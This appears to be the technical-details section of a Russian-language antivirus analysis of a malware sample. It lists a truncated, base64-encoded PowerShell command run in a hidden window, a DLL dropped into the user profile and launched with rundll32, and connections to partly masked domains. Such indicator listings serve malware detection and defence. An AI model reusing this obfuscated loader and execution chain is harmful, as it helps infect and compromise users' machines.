Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABDAHgAawA0AF8AMwBtAD0AKAAnAFgAJwArACgAJwBnAHEAagAnACsAJwB0ACcAKQArACcAbQAxACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBzAGUAUgBwAHIATwBGAGkAbABlAFwAZwBzA...
- %HOMEPATH%\gsx9tzb\kt1_x0z\uhenop.dll
- 'si##ecor.cl':443
- 'sa####gdalpur.org':443
- 'wc.###atronic.es':443
- DNS ASK si##ecor.cl
- DNS ASK sa####gdalpur.org
- DNS ASK wc.###atronic.es
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABDAHgAawA0AF8AMwBtAD0AKAAnAFgAJwArACgAJwBnAHEAagAnACsAJwB0ACcAKQArACcAbQAxACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBzAGUAUgBwAHIATwBGAGkAbABlAFwAZwBzA...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Gsx9tzb\Kt1_x0z\Uhenop.dll 0